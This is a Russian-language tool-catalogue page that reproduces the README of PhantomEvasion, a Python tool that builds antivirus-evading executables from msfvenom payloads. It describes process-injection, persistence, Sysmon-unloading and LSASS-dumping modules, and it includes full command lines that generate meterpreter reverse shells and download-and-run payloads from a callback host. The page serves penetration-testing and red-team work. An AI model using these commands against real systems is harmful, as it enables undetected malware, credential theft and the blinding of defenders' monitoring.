Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PhantomEvasion — Инструмент для обхода антивирусов на Python, создающий необнаруживаемые исполняемые файлы из полезных нагрузок msfvenom с использованием продвинутых методов, таких как внедрение мусорного кода, шифрование, подделка сертификатов и несколько способов выполнения. | Kitploit
Инструменты/GitHubGitHub/esskumar/phantomevasion
Повышение привилегийФреймворки для эксплойтовГенерация полезной нагрузкиМеханизмы персистентностиШелл-кодПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubesskumar/phantomevasion

PhantomEvasion

Инструмент для обхода антивирусов на Python, создающий необнаруживаемые исполняемые файлы из полезных нагрузок msfvenom с использованием продвинутых методов, таких как внедрение мусорного кода, шифрование, подделка сертификатов и несколько способов выполнения.

1716 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

PHANTOM EVASION 3.0

Phantom-Evasion — это инструмент для обхода антивирусов, написанный на Python (совместим как с python, так и с python3), способный генерировать (почти) полностью необнаруживаемые исполняемые файлы даже с наиболее распространёнными полезными нагрузками x86 msfvenom.

Следующие ОС официально поддерживают автоматическую настройку:

  1. Kali Linux
  2. Parrot Security

Следующие ОС, скорее всего, поддерживают автоматическую настройку, но требуют ручной установки metasploit-framework:

  1. OSX (протестировано на Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. другие дистрибутивы Debian
  7. Centos
  8. Fedora
  9. Blackarch

Следующие ОС требуют ручной настройки:

  1. Windows 10

Просто клонируйте git или скачайте и распакуйте папку Phantom-Evasion.

Настройка:

Автоматическая настройка, откройте терминал и выполните:

root@kitploit:~
python3 phantom-evasion.py --setup

или:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

или запустите phantom-evasion в интерактивном режиме и выберите пункт 7.

Зависимости (только для ручной настройки)

  1. metasploit-framework
  2. mingw-w64 (cygwin on windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

КОМАНДНАЯ СТРОКА / ИНТЕРАКТИВНЫЙ РЕЖИМ:

  1. Запустите phantom-evasion в интерактивном режиме:
root@kitploit:~
python3 phantom-evasion.py

или:

root@kitploit:~
./phantom-evasion.py
  1. В противном случае, для просмотра опций командной строки:
root@kitploit:~
python3 phantom-evasion.py --help

или:

root@kitploit:~
./phantom-evasion.py --help

МОДУЛИ WINDOWS

  • Каждый модуль полезной нагрузки Windows на C может быть скомпилирован (поддерживает x86 и x64) в виде EXE или DLL/ReflectiveDLL.

  • Случайная вставка мусорного кода (можно задать интенсивность, частоту и вероятность повторной вставки) и методы обхода антивирусов Windows (частота настраивается).

  • Поддерживается многобайтовое Xor/Vigenere шифрование шелл-кода/файла как при инъекции шелл-кода, так и в модулях Download Exec.

  • Поддерживаются методы Ntdll unhookapi и маскировки процесса PEB.

  • Широкий спектр режимов выполнения (как локальных, так и удалённых).

  • Поддерживаются различные режимы выделения памяти для полезной нагрузки (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

  • Поддерживается динамическая загрузка Windows API.

  • Поддерживаются спуфинг и подпись сертификатов.

  • Удаление символов (стриппинг) исполняемого файла (https://en.wikipedia.org/wiki/Strip_(Unix))

Windows C — Инъекция шелл-кода

Поддерживаются полезные нагрузки msfvenom для Windows и пользовательские шелл-коды. Шелл-код может быть сохранён как ресурс и извлечён во время выполнения с помощью API FindResource.

Поддерживаемое шифрование шелл-кода:

root@kitploit:~
1.none

2.Multibyte-Xor

3.Double-key Multibyte-Xor

4.Vigenere

5.Double-key Vigenere
  1. Метод локального выполнения может быть одним из следующих:

    Thread

    APC

    Режим локального выделения памяти может быть одним из следующих:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. Метод удалённого выполнения может быть одним из следующих:

    ThreadExecutionHijack (сокращённо TEH)

    Processinject (сокращённо PI)

    APCSpray (сокращённо APCS)

    EarlyBird (сокращённо EB)

    EntryPointHijack (сокращённо EPH)

    Режим удалённого выделения памяти может быть одним из следующих:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Windows Pure C — стейджер meterpreter (C)

Модули стейджеров meterpreter на чистом C (TCP/HTTP/HTTPS), совместимые с msfconsole и Cobalt Strike beacon. (reverse_tcp / reverse_http / reverse_https)

При использовании командной строки:

root@kitploit:~
reverse_tcp c stager — WRT

reverse_http c stager — WRH

reverse_https c stager — WRS
  1. Метод локального выполнения может быть одним из следующих:

    Thread

    APC

    Режим локального выделения памяти может быть одним из следующих:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows C — Download-Exec без записи на диск

Загрузка exe/dll из указанного URL в память и выполнение/загрузка в удалённый процесс (без записи на диск).

Поддерживается загрузка зашифрованных EXE/DLL:

root@kitploit:~
1.none
                                 
2.Multibyte-Xor
                                 
3.Double-key Multibyte-Xor
                               
4.Vigenere
                                
5.Double-key Vigenere

Зашифрованный DLL/EXE будет сохранён как originalfilename + "crypt" + ".dll" или ".exe" — именно его нужно загрузить.

  1. Windows DownloadExecExe NoDiskWrite (WDE в режиме командной строки):

    Метод удалённого выполнения может быть одним из следующих:

    ProcessHollowing (сокращённо PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD в режиме командной строки):

    Метод удалённой загрузки может быть одним из следующих:

    ReflectiveDll (сокращённо RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (сокращённо MM) — только x86

ПОЛЕЗНЫЕ НАГРУЗКИ LINUX

Модуль инъекции шелл-кода Linux (C)

Поддерживаются полезные нагрузки msfvenom для Linux и пользовательские шелл-коды.

ПОЛЕЗНЫЕ НАГРУЗКИ ANDROID

  1. Обфускация бэкдора msfvenom Android:

    Обфускация полезных нагрузок msfvenom и пересборка (smali/baksmali) с помощью apktool. Обфусцированная полезная нагрузка может быть использована для создания бэкдора в легитимных APK-файлах.

МОДУЛИ ПЕРСИСТЕНТНОСТИ

  1. Windows Persistence RegCreateKeyExW — добавление ключа реестра (C) Скомпилированный исполняемый файл необходимо загрузить на целевую машину и выполнить, указав полный путь к файлу, который нужно добавить в автозагрузку, в качестве аргумента.

  2. Windows Persistence REG — добавление ключа реестра (CMD) Этот модуль генерирует полезные нагрузки для командной строки (добавление ключа реестра через REG.exe).

  3. Windows Persistence Keep Process Alive (C) Скомпилированный исполняемый файл необходимо загрузить на целевую машину и выполнить. Использование CreateToolSnapshot, ProcessFirst и ProcessNext для проверки, жив ли указанный процесс, каждые X секунд (если нет — создаётся новый процесс с помощью WinExec API).

  4. Windows Persistence Schtasks (CMD)

    Этот модуль генерирует полезные нагрузки для командной строки (с помощью Schtasks.exe).

  5. Windows Persistence Create Service (CMD)

    Этот модуль генерирует полезные нагрузки для командной строки (с помощью sc.exe).

МОДУЛИ ПОВЫШЕНИЯ ПРИВИЛЕГИЙ

  1. Windows DuplicateTokenEx (C)

    Создание нового процесса с токеном, клонированным из другого процесса. Скомпилированный исполняемый файл необходимо загрузить на целевую машину и выполнить.

МОДУЛИ ПОСТЭКСПЛУАТАЦИИ

  1. Windows Unload Sysmon (C) Выгрузка драйвера Sysmon, что приводит к остановке записи журналов событий Sysmon. Скомпилированный исполняемый файл необходимо загрузить на целевую машину и выполнить.

  2. Windows Unload Sysmon (CMD) Выгрузка драйвера Sysmon, что приводит к остановке записи журналов событий Sysmon.

  3. Windows Attrib hide file (CMD) Использование attrib для скрытия файла

  4. Windows SetFileAttribute hidden (C) Скрытие файла с помощью API SetFileAttribute Скомпилированный исполняемый файл необходимо загрузить на целевую машину и выполнить.

  5. Windows DumpLsass (C) Дамп Lsass с помощью API MiniWriteDumpWrite. Скомпилированный исполняемый файл необходимо загрузить на целевую машину и выполнить.

  6. Windows DumpLsass (CMD)

    Дамп Lsass из командной строки.

Примеры использования Phantom-Evasion в режиме командной строки:

  1. Инъекция шелл-кода Windows, вывод подписанного exe с поддельным https-сертификатом, метод локального выполнения: Thread, память: Virtual_RWX, шифрование: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. Инъекция шелл-кода Windows x64, вывод в виде рефлективной DLL, метод удалённого выполнения: ProcessInject (PI), память: Virtual_RW/RX, целевой процесс: SkypeApp.exe, шифрование: двойной ключ xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. Инъекция шелл-кода Windows x64, вывод в виде strip-ованной DLL, шелл-код сохранён как ресурс, метод удалённого выполнения: EarlyBird (EB), память: Virtual_RW/RX, целевой процесс: svchost.exe, шифрование: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. Windows x64 reverse https стейджер, вывод в виде strip-ованной DLL, метод локального выполнения: Thread, память: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. Windows x86 downloadexec dll, вывод в виде strip-ованного exe, метод удалённого выполнения: ManualMap (MM), целевой процесс: OneDrive.exe, размер загрузки 1000000 байт
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. Windows x64 downloadexec exe, вывод в виде strip-ованной рефлективной DLL, метод удалённого выполнения: ProcessHollowing (PH), целевой процесс: svchost.exe, размер загрузки 1000000 байт
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Лицензия

GPLv3.0

Благодарности и полезные ресурсы

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Скачать инструмент